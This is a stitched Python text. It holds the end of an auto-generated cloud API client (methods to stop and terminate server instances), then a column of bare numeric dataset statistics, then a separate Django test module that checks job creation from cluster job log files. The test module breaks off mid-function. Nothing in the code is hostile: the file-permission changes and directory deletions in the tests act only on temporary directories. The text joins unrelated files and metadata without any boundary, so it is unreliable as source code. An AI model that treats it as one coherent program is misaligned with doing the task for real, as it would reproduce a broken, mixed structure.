def stop_server_instances_with_http_info(self, stop_server_instances_request, **kwargs): # noqa: E501
"""stop_server_instances # noqa: E501
서버인스턴스정지 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.stop_server_instances_with_http_info(stop_server_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param StopServerInstancesRequest stop_server_instances_request: stopServerInstancesRequest (required)
:return: StopServerInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['stop_server_instances_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method stop_server_instances" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'stop_server_instances_request' is set
if ('stop_server_instances_request' not in params or
params['stop_server_instances_request'] is None):
raise ValueError("Missing the required parameter `stop_server_instances_request` when calling `stop_server_instances`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'stop_server_instances_request' in params:
body_params = params['stop_server_instances_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/stopServerInstances', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StopServerInstancesResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def terminate_server_instances(self, terminate_server_instances_request, **kwargs): # noqa: E501
"""terminate_server_instances # noqa: E501
서버인스턴스반납 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.terminate_server_instances(terminate_server_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param TerminateServerInstancesRequest terminate_server_instances_request: terminateServerInstancesRequest (required)
:return: TerminateServerInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.terminate_server_instances_with_http_info(terminate_server_instances_request, **kwargs) # noqa: E501
else:
(data) = self.terminate_server_instances_with_http_info(terminate_server_instances_request, **kwargs) # noqa: E501
return data
def terminate_server_instances_with_http_info(self, terminate_server_instances_request, **kwargs): # noqa: E501
"""terminate_server_instances # noqa: E501
서버인스턴스반납 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.terminate_server_instances_with_http_info(terminate_server_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param TerminateServerInstancesRequest terminate_server_instances_request: terminateServerInstancesRequest (required)
:return: TerminateServerInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['terminate_server_instances_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method terminate_server_instances" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'terminate_server_instances_request' is set
if ('terminate_server_instances_request' not in params or
params['terminate_server_instances_request'] is None):
raise ValueError("Missing the required parameter `terminate_server_instances_request` when calling `terminate_server_instances`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'terminate_server_instances_request' in params:
body_params = params['terminate_server_instances_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/terminateServerInstances', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TerminateServerInstancesResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 45.643874
| 193
| 0.665973
| 32,160
| 295,042
| 5.739055
| 0.014086
| 0.043561
| 0.026819
| 0.030493
| 0.974508
| 0.968673
| 0.961131
| 0.945153
| 0.923698
| 0.905672
| 0
| 0.013791
| 0.257313
| 295,042
| 6,463
| 194
| 45.650936
| 0.828508
| 0.326692
| 0
| 0.733989
| 1
| 0
| 0.244148
| 0.156932
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037921
| false
| 0.007303
| 0.004775
| 0
| 0.099438
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
72dd91dc2343a7f964058e8d31d0daada0ed06ec
| 53,476
|
py
|
Python
|
tests/test_utils/test_jobinfo/test_poll.py
|
tbrlpld/CAEJobDiary
|
16676b3eaa56aafdf54579d19baa6540375d91e4
|
[
"MIT"
] | null | null | null |
tests/test_utils/test_jobinfo/test_poll.py
|
tbrlpld/CAEJobDiary
|
16676b3eaa56aafdf54579d19baa6540375d91e4
|
[
"MIT"
] | 2
|
2020-06-06T01:37:33.000Z
|
2020-06-06T04:16:18.000Z
|
tests/test_utils/test_jobinfo/test_poll.py
|
tbrlpld/CAEJobDiary
|
16676b3eaa56aafdf54579d19baa6540375d91e4
|
[
"MIT"
] | null | null | null |
"""
Module to unittest the functions of the `poll` module
"""
import logging
import logging.config
import os
import shutil
import tempfile
from datetime import datetime, timedelta
import before_after
from django.contrib.auth import get_user_model
from django.test import TestCase
import pytz
from diary.models import Job
from utils.caefileio.readme import get_job_info_from_readme
from utils.logger_copy import copy_logger_settings
from test_utils.helper import add_content_to_temp_inputfilepath
from test_utils.helper import make_readme
# Major Functions
from utils.jobinfo.poll import start_job_creation_process_from_joblogfile
# Helper Functions
from utils.jobinfo.poll import is_recent
from utils.jobinfo.poll import required_keys_avaiable
# -----------------------------------------------------------------------------
# Logging
# -----------------------------------------------------------------------------
logger = logging.getLogger("testing_control").getChild(__name__)
copy_logger_settings("testing_subject", "utils.jobinfo.poll")
# -----------------------------------------------------------------------------
# Check Environment
# -----------------------------------------------------------------------------
# On the CI (gitlab-runner) the defined jobs are run as root.
# root can always read all files, even if permissions are removed.
# Tests for missing permissions are needed though.
# Therefore, certain tests can not be asserted correctly in the CI environment.
# To exclude tests from assertion, I need to know if I am on the CI.
settings_module = os.environ['DJANGO_SETTINGS_MODULE']
running_on_ci = settings_module.endswith(".ci")
logger.info("Tests running on CI: {}".format(running_on_ci))
# -----------------------------------------------------------------------------
# Make `User` model available
# -----------------------------------------------------------------------------
User = get_user_model()
# -----------------------------------------------------------------------------
# Test Start Job Creation Process From Joblogfile
# -----------------------------------------------------------------------------
class TestStartJobCreationProcessFromJoblogfile(TestCase):
"""
Test the `start_job_creation_process_from_joblogfile` method of `poll`
"""
# -------------------------------------------------------------------------
def setUp(self):
self.user_A = User.objects.create(
username="usera", email="usera@example.com")
self.project_A = "3001234"
self.project_B = "3005678"
self.job_user_A_project_A = Job(
job_id=123,
user=self.user_A,
project=self.project_A,
main_name="some_main_title.key",
sub_dir="/some/not/existing/path",
job_status=Job.JOB_STATUS_PENDING
)
self.job_user_A_project_A.full_clean()
self.job_user_A_project_A.save()
self.job_user_A_project_B = Job(
job_id=456,
user=self.user_A,
project=self.project_B,
main_name="another_main_title.key",
sub_dir="/some/not/existing/path",
job_status=Job.JOB_STATUS_RUNNING
)
self.job_user_A_project_B.full_clean()
self.job_user_A_project_B.save()
self.free_id = 789
# -------------------------------------------------------------------------
def test_not_existing_joblogfile(self):
logger.info("-"*80)
logger.info("Test not existing joblogfile")
logger.info("-"*80)
number_of_jobs_before_processing = Job.objects.count()
joblogfile_path = "/this/should/not/exist/file.log"
self.assertFalse(os.path.exists(joblogfile_path))
job_created = start_job_creation_process_from_joblogfile(
joblogfile_path)
self.assertFalse(job_created)
# Number of jobs should not have changed
self.assertEqual(Job.objects.count(), number_of_jobs_before_processing)
# -------------------------------------------------------------------------
def test_processing_of_joblogfile_with_empty_infos(self):
logger.info("-"*80)
logger.info("Test processing of joblogfile with empty infos")
logger.info("-"*80)
number_of_jobs_before_processing = Job.objects.count()
# Defining joblogfile content
joblogfile_content = """
job_number:
sge_o_workdir:
"""
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
job_created = start_processing_from_content(joblogfile_content)
self.assertFalse(job_created)
# Number of jobs should not have changed
self.assertEqual(Job.objects.count(), number_of_jobs_before_processing)
# -------------------------------------------------------------------------
def test_pending_job_dir_is_file_not_dir(self):
"""
When job_dir is file error should be thrown and logged
When the job_dir is actually a file then something went wrong
determining what the job_dir is. In that case an error should be thrown
and be logged.
"""
logger.info("-"*80)
logger.info("Test processing when the pending 'job_dir' is a file not directory")
logger.info("-"*80)
with tempfile.TemporaryDirectory() as sub_dir:
job_id = self.free_id
job_dir_file = os.path.join(sub_dir, str(job_id) + ".pending")
open(job_dir_file, 'a').close()
logger.info("sub_dir content: {}".format(os.listdir(sub_dir)))
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
logger.info("joblogfile_content: {}".format(joblogfile_content))
with tempfile.NamedTemporaryFile(mode="w") as joblogfile:
joblogfile.write(joblogfile_content)
joblogfile.seek(0)
with self.assertLogs(logger="utils.jobinfo.poll",
level=logging.ERROR) as cm:
start_job_creation_process_from_joblogfile(joblogfile.name)
logger.info("Logs of required level: {}".format(cm.output))
# -------------------------------------------------------------------------
def test_processing_from_joblogfile_pending_job(self):
logger.info("-"*80)
logger.info("Test processing of pending job")
logger.info("-"*80)
job_id = self.free_id
with tempfile.TemporaryDirectory() as tempdir:
sub_dir = tempdir
# Make pending job folder
job_dir = os.path.join(tempdir, str(job_id) + ".pending")
os.makedirs(job_dir)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=job_dir,
job_id=job_id,
sub_dir=sub_dir,
username=self.user_A.username,
email=self.user_A.email,
base_runs_str=str(self.job_user_A_project_A.job_id),
main_name=main_name
)
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
start_processing_from_content(joblogfile_content)
# Assertions
all_jobs = Job.objects.all()
self.assertEqual(len(all_jobs), 3) # The setup ones and the new one
processed_job = Job.objects.get(job_id=job_id)
self.assertEqual(processed_job.job_id, job_id)
self.assertEqual(processed_job.sub_dir, sub_dir)
self.assertEqual(processed_job.job_status, Job.JOB_STATUS_PENDING)
self.assertEqual(processed_job.job_dir, job_dir)
self.assertEqual(processed_job.readme_filename, readme_filename)
self.assertEqual(processed_job.main_name, main_name)
self.assertEqual(processed_job.solver, "dyn")
tz = pytz.timezone("Europe/Berlin")
aware_datetime = tz.localize(datetime(2018, 6, 7, 17, 21, 21))
self.assertEqual(processed_job.sub_date, aware_datetime)
self.assertEqual(processed_job.info, "Some info text")
self.assertIn(self.job_user_A_project_A, processed_job.base_runs.all())
self.assertEqual(processed_job.user, self.user_A)
self.assertEqual(processed_job.user.username, self.user_A.username)
self.assertEqual(processed_job.user.email, self.user_A.email)
# -------------------------------------------------------------------------
def test_processing_from_joblogfile_running_job(self):
logger.info("-"*80)
logger.info("Test processing of running job")
logger.info("-"*80)
job_id = self.free_id
cluster_temp_dir = tempfile.TemporaryDirectory()
cluster_scratch_dir = os.path.join(cluster_temp_dir.name, str(job_id))
os.makedirs(cluster_scratch_dir)
logger.debug("Cluster scratch dir: {}".format(cluster_scratch_dir))
with tempfile.TemporaryDirectory() as tempdir:
sub_dir = tempdir
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
# Create cluster script
cluster_script_content = "cd {}*".format(cluster_scratch_dir)
logger.debug("Cluster script content: {}".format(cluster_script_content))
cluster_script_filename = "{}.dyn-dmp.x01xx012.16.sh".format(job_id)
cluster_script_filepath = os.path.join(sub_dir, cluster_script_filename)
with open(cluster_script_filepath, mode="w") as f:
f.write(cluster_script_content)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=cluster_scratch_dir,
job_id=job_id,
sub_dir=sub_dir,
username=self.user_A.username,
email=self.user_A.email,
base_runs_str=str(self.job_user_A_project_A.job_id),
main_name=main_name
)
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
start_processing_from_content(joblogfile_content)
# Cleaning up the cluster scratch dir / tempdir
cluster_temp_dir.cleanup()
# Assertions
all_jobs = Job.objects.all()
self.assertEqual(len(all_jobs), 3)
processed_job = Job.objects.get(job_id=job_id)
self.assertEqual(processed_job.job_id, job_id)
self.assertEqual(processed_job.sub_dir, sub_dir)
self.assertEqual(processed_job.job_status, Job.JOB_STATUS_RUNNING)
self.assertEqual(processed_job.job_dir, cluster_scratch_dir)
self.assertEqual(processed_job.readme_filename, readme_filename)
self.assertEqual(processed_job.main_name, main_name)
self.assertEqual(processed_job.solver, "dyn")
tz = pytz.timezone("Europe/Berlin")
aware_datetime = tz.localize(datetime(2018, 6, 7, 17, 21, 21))
self.assertEqual(processed_job.sub_date, aware_datetime)
self.assertEqual(processed_job.info, "Some info text")
self.assertIn(self.job_user_A_project_A, processed_job.base_runs.all())
self.assertEqual(processed_job.user, self.user_A)
self.assertEqual(processed_job.user.username, self.user_A.username)
self.assertEqual(processed_job.user.email, self.user_A.email)
# -------------------------------------------------------------------------
def test_processing_abort_due_to_duplication(self):
logger.info("-"*80)
logger.info("Test processing abort due to existing job in DB.")
logger.info("-"*80)
number_of_jobs_before_processing = Job.objects.count()
# Use job id of job already in the DB
job_id = self.job_user_A_project_A.job_id
with tempfile.TemporaryDirectory() as tempdir:
sub_dir = tempdir
# Defining jonlogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
# Make pending job folder
job_dir = os.path.join(tempdir, str(job_id) + ".pending")
os.makedirs(job_dir)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=job_dir,
job_id=job_id,
sub_dir=sub_dir,
username=self.user_A.username,
email=self.user_A.email,
base_runs_str="",
main_name=main_name
)
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
return_value = start_processing_from_content(joblogfile_content)
self.assertFalse(return_value)
# Number of jobs should not be changed
self.assertEqual(Job.objects.count(), number_of_jobs_before_processing)
# -------------------------------------------------------------------------
def test_no_read_access_to_finished_job(self):
if running_on_ci:
return None
logger.info("-"*80)
logger.info("Test processing with a not readable `job_dir`")
logger.info("-"*80)
number_of_jobs_before_processing = Job.objects.count()
job_id = self.free_id
with tempfile.TemporaryDirectory() as sub_dir:
# Defining jonlogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
# Make job folder
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=job_dir,
job_id=job_id,
sub_dir=sub_dir,
username=self.user_A.username,
email=self.user_A.email,
base_runs_str="",
main_name=main_name
)
# Remove read rights on job_dir
os.chmod(job_dir, 0o222)
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
return_value = start_processing_from_content(joblogfile_content)
# Adding rights back for deletion
os.chmod(job_dir, 0o777)
self.assertFalse(return_value)
# Number of jobs should not be changed
self.assertEqual(Job.objects.count(), number_of_jobs_before_processing)
# -------------------------------------------------------------------------
def test_no_read_access_to_finished_job_README(self):
if running_on_ci:
return None
logger.info("-"*80)
logger.info("Test processing with a not readable README")
logger.info("-"*80)
number_of_jobs_before_processing = Job.objects.count()
job_id = self.free_id
with tempfile.TemporaryDirectory() as sub_dir:
# Defining jonlogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
# Make job folder
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=job_dir,
job_id=job_id,
sub_dir=sub_dir,
username="doej",
email="john.doe@example.com",
base_runs_str="",
main_name=main_name
)
# Remove read rights on job_dir
os.chmod(readme_filepath, 0o222)
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
return_value = start_processing_from_content(joblogfile_content)
# Adding rights back for deletion
os.chmod(readme_filepath, 0o777)
self.assertFalse(return_value)
# Number of jobs should not be changed
self.assertEqual(Job.objects.count(), number_of_jobs_before_processing)
# -------------------------------------------------------------------------
def test_not_all_required_keys_in_README(self):
logger.info("-"*80)
logger.info("Test processing with a README where username is missing")
logger.info("-"*80)
number_of_jobs_before_processing = Job.objects.count()
job_id = self.free_id
with tempfile.TemporaryDirectory() as sub_dir:
# Defining jonlogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
# Make job folder
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
# Create README
logger.debug("Making readme file...")
email=self.user_A.email
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_content="""
README for {main_name}
base-run (job-id):
information :
Some info text
********Header********
SOLVERVER: mpp.s.R9.1.0.113698.113698_dmp_sp
******Environment******
EMail: {email}
Sub-Date: 2018-06-07__17:21:21
Solver: dyn
SubDir: {sub_dir}
FILE: {main_name}
JOBID: {job_id}
""".format(
email=email,
sub_dir=sub_dir,
job_id=str(job_id),
main_name=main_name)
logger.debug(readme_content)
readme_filename = f"README.{main_name}.README"
readme_filepath = os.path.join(job_dir, readme_filename)
with open(readme_filepath, mode="w") as f:
f.write(readme_content)
# Making sure that the readme does miss some required keys
self.assertFalse(
required_keys_avaiable(
get_job_info_from_readme(readme_filepath)))
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
with self.assertLogs(logger="utils.jobinfo.poll",
level=logging.ERROR) as cm:
job_created = start_processing_from_content(joblogfile_content)
logger.info("Logs of required level: {}".format(cm.output))
self.assertFalse(job_created)
# Number of jobs should not be changed
self.assertEqual(Job.objects.count(), number_of_jobs_before_processing)
# -------------------------------------------------------------------------
def test_empty_README(self):
logger.info("-"*80)
logger.info("Test processing with an empty README")
logger.info("-"*80)
number_of_jobs_before_processing = Job.objects.count()
job_id = self.free_id
with tempfile.TemporaryDirectory() as sub_dir:
# Defining jonlogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
# Make job folder
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
# Create README
logger.debug("Making readme file...")
email=self.user_A.email
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_content=""
readme_filename = f"README.{main_name}.README"
readme_filepath = os.path.join(job_dir, readme_filename)
with open(readme_filepath, mode="w") as f:
f.write(readme_content)
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
with self.assertLogs(logger="utils.jobinfo.poll",
level=logging.ERROR) as cm:
job_created = start_processing_from_content(joblogfile_content)
logger.info("Logs of required level: {}".format(cm.output))
self.assertFalse(job_created)
# Number of jobs should not be changed
self.assertEqual(Job.objects.count(), number_of_jobs_before_processing)
# -------------------------------------------------------------------------
def test_no_README_in_job_dir(self):
logger.info("-"*80)
logger.info("Test processing without a README in the job_dir")
logger.info("-"*80)
number_of_jobs_before_processing = Job.objects.count()
job_id = self.free_id
with tempfile.TemporaryDirectory() as sub_dir:
# Defining jonlogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
# Make job folder
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
with self.assertLogs(logger="utils.jobinfo.poll",
level=logging.WARNING) as cm:
job_created = start_processing_from_content(joblogfile_content)
logger.info("Logs of required level: {}".format(cm.output))
self.assertFalse(job_created)
# Number of jobs should not be changed
self.assertEqual(Job.objects.count(), number_of_jobs_before_processing)
# -------------------------------------------------------------------------
def test_job_file_not_folder(self):
logger.info("-"*80)
logger.info(
"Test processing with the `job_dir` being a file not a directory")
logger.info("-"*80)
number_of_jobs_before_processing = Job.objects.count()
job_id = self.free_id
with tempfile.TemporaryDirectory() as sub_dir:
# Defining jonlogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
# Make job file (not folder)
job_dir = os.path.join(sub_dir, str(job_id))
open(job_dir, "w").close()
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
with self.assertLogs(logger="utils.jobinfo.poll",
level=logging.ERROR) as cm:
job_created = start_processing_from_content(joblogfile_content)
logger.info("Logs of required level: {}".format(cm.output))
self.assertFalse(job_created)
# Number of jobs should not be changed
self.assertEqual(Job.objects.count(), number_of_jobs_before_processing)
class TestRaceConditionInProcessing(TestCase):
"""
Test the `start_job_creation_process_from_joblogfile` method of `poll`
"""
# -------------------------------------------------------------------------
def test_racecondition_running_job_finishes_before_getting_readme_filename(self):
logger.info("-"*80)
logger.info("Test processing with running job that finishes during processing")
logger.info("Job finishes before README filename is determined in job_dir")
logger.info("-"*80)
def finish_running_job(*a, **kw):
"""
Move content of cluster scratch dir to job_dir in sub_dir
The cluster scratch dir is removed. This simulates the SGE process
when a job finishes.
"""
logger.info("Job finished ***********")
# Make job_dir in sub_dir
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
# Copy files
for file in os.listdir(cluster_scratch_dir):
filepath = os.path.join(cluster_scratch_dir, file)
shutil.copy(filepath, job_dir)
# Remove cluster scratch dir
shutil.rmtree(cluster_scratch_dir)
# base_run = Job.objects.create(job_id=123)
existing_user = User.objects.create(
username="doej",
email="John.Doe@example.com")
job_id = 456
cluster_temp_dir = tempfile.TemporaryDirectory()
cluster_scratch_dir = os.path.join(cluster_temp_dir.name, str(job_id))
os.makedirs(cluster_scratch_dir)
logger.debug("Cluster scratch dir: {}".format(cluster_scratch_dir))
with tempfile.TemporaryDirectory() as tempdir:
sub_dir = tempdir
# Create cluster script
cluster_script_content = "cd {}*".format(cluster_scratch_dir)
logger.debug("Cluster script content: {}".format(cluster_script_content))
cluster_script_filename = "{}.dyn-dmp.l01cl012.16.sh".format(job_id)
cluster_script_filepath = os.path.join(sub_dir, cluster_script_filename)
with open(cluster_script_filepath, mode="w") as f:
f.write(cluster_script_content)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=cluster_scratch_dir,
job_id=job_id,
sub_dir=sub_dir,
username=existing_user.username,
email=existing_user.email,
base_runs_str="",
main_name=main_name
)
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
with before_after.before(
"utils.jobinfo.poll.get_readme_filename_from_job_dir",
finish_running_job):
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
start_processing_from_content(joblogfile_content)
# Cleaning up the cluster scratch dir / tempdir
cluster_temp_dir.cleanup()
# Assertions
all_jobs = Job.objects.all()
self.assertEqual(len(all_jobs), 1) # only the created one
processed_job = Job.objects.get(job_id=job_id)
self.assertEqual(processed_job.job_status, Job.JOB_STATUS_FINISHED)
# -------------------------------------------------------------------------
def test_racecondition_running_job_finishes_before_getting_readme_info(self):
logger.info("-"*80)
logger.info("Test processing with running job that finishes during processing")
logger.info("Job finishes before info is retrieved from README")
logger.info("-"*80)
def finish_running_job(*a, **kw):
"""
Move content of cluster scratch dir to job_dir in sub_dir
The cluster scratch dir is removed. This simulates the SGE process
when a job finishes.
"""
logger.info("Job finished ***********")
# Make job_dir in sub_dir
job_dir = os.path.join(sub_dir, str(job_id))
os.makedirs(job_dir)
# Copy files
for file in os.listdir(cluster_scratch_dir):
filepath = os.path.join(cluster_scratch_dir, file)
shutil.copy(filepath, job_dir)
# Remove cluster scratch dir
shutil.rmtree(cluster_scratch_dir)
# base_run = Job.objects.create(job_id=123)
existing_user = User.objects.create(
username="doej",
email="John.Doe@example.com")
job_id = 456
cluster_temp_dir = tempfile.TemporaryDirectory()
cluster_scratch_dir = os.path.join(cluster_temp_dir.name, str(job_id))
os.makedirs(cluster_scratch_dir)
logger.debug("Cluster scratch dir: {}".format(cluster_scratch_dir))
with tempfile.TemporaryDirectory() as tempdir:
sub_dir = tempdir
# Create cluster script
cluster_script_content = "cd {}*".format(cluster_scratch_dir)
logger.debug("Cluster script content: {}".format(cluster_script_content))
cluster_script_filename = "{}.dyn-dmp.l01cl012.16.sh".format(job_id)
cluster_script_filepath = os.path.join(sub_dir, cluster_script_filename)
with open(cluster_script_filepath, mode="w") as f:
f.write(cluster_script_content)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=cluster_scratch_dir,
job_id=job_id,
sub_dir=sub_dir,
username=existing_user.username,
email=existing_user.email,
base_runs_str="",
main_name=main_name
)
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
with before_after.before(
"utils.jobinfo.poll.get_job_info_from_readme",
finish_running_job):
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
start_processing_from_content(joblogfile_content)
# Cleaning up the cluster scratch dir / tempdir
cluster_temp_dir.cleanup()
# Assertions
all_jobs = Job.objects.all()
self.assertEqual(len(all_jobs), 1) # only the created one
processed_job = Job.objects.get(job_id=job_id)
self.assertEqual(processed_job.job_status, Job.JOB_STATUS_FINISHED)
# -------------------------------------------------------------------------
def test_racecondition_pending_job_deleted_before_getting_readme_filename(self):
logger.info("-"*80)
logger.info("Test processing with job_dir (pending) is deleted after status is determined")
logger.info("-"*80)
def delete_job_dir(*a, **kw):
"""
Delete job_dir
"""
logger.info("Job folder is deleted ***********")
# Remove cluster scratch dir
shutil.rmtree(job_dir)
# base_run = Job.objects.create(job_id=123)
existing_user = User.objects.create(
username="doej",
email="John.Doe@example.com")
job_id = 456
with tempfile.TemporaryDirectory() as sub_dir:
# Make job_dir in sub_dir
job_dir = os.path.join(sub_dir, str(job_id) + ".pending")
os.makedirs(job_dir)
# Create README
main_name = "0123_PRJ_VEHC_SLD_load_case_X_12.5_.key"
readme_filename, readme_filepath = make_readme(
job_dir=job_dir,
job_id=job_id,
sub_dir=sub_dir,
username=existing_user.username,
email=existing_user.email,
base_runs_str="",
main_name=main_name
)
# Defining joblogfile content
joblogfile_content = """
job_number: {job_id}
sge_o_workdir: {sub_dir}
""".format(
sub_dir=sub_dir,
job_id=job_id
)
with before_after.before(
"utils.jobinfo.poll.get_readme_filename_from_job_dir",
delete_job_dir):
# Start processing from joblogfile content
start_processing_from_content = add_content_to_temp_inputfilepath(
start_job_creation_process_from_joblogfile)
job_created = start_processing_from_content(joblogfile_content)
# Assertions
self.assertFalse(job_created)
all_jobs = Job.objects.all()
self.assertEqual(len(all_jobs), 0)
# -------------------------------------------------------------------------
def test_racecondition_running_job_deleted_before_getting_readme_filename(self):
logger.info("-"*80)
logger.info("Test processing with job_dir (running) is deleted after status is determined")
logger.info("-"*80)
def delete_cluster_job_dir(*a, **kw):
"""
Delete job_dir in cluster scratch dir
"""
logger.info("Job folder is deleted ***********")
# Remove cluster scratch dir
shutil.rmtree(cluster_scratch_dir)
# base_run = Job.objects.create(job_id=123)
existing_user = User.objects.create(
username="doej",
email="John.Doe@example.com")
job_id = 456
cluster_temp_dir = tempfile.TemporaryDirectory()
cluster_scratch_dir = os.path.join(cluster_temp_dir.name, str(job_id))
os.makedirs(cluster_scratch_dir)
logger.debug("Cluster scratch dir: {}".format(cluster_scratch_dir))
with tempfile.TemporaryDirectory() as tempdir:
sub_dir = tempdir
# Create cluster script
cluster_script_content = "cd {}*".format(cluster_scratch_dir)
logger.debug("Cluster script content: {}".format(cluster_script_content))
cluster_script_filename = "{}.dyn-dmp.l01cl012.16.sh".format(job_id)
cluster_script_filepath = os.path.join(sub_dir, cluster_script_filename)
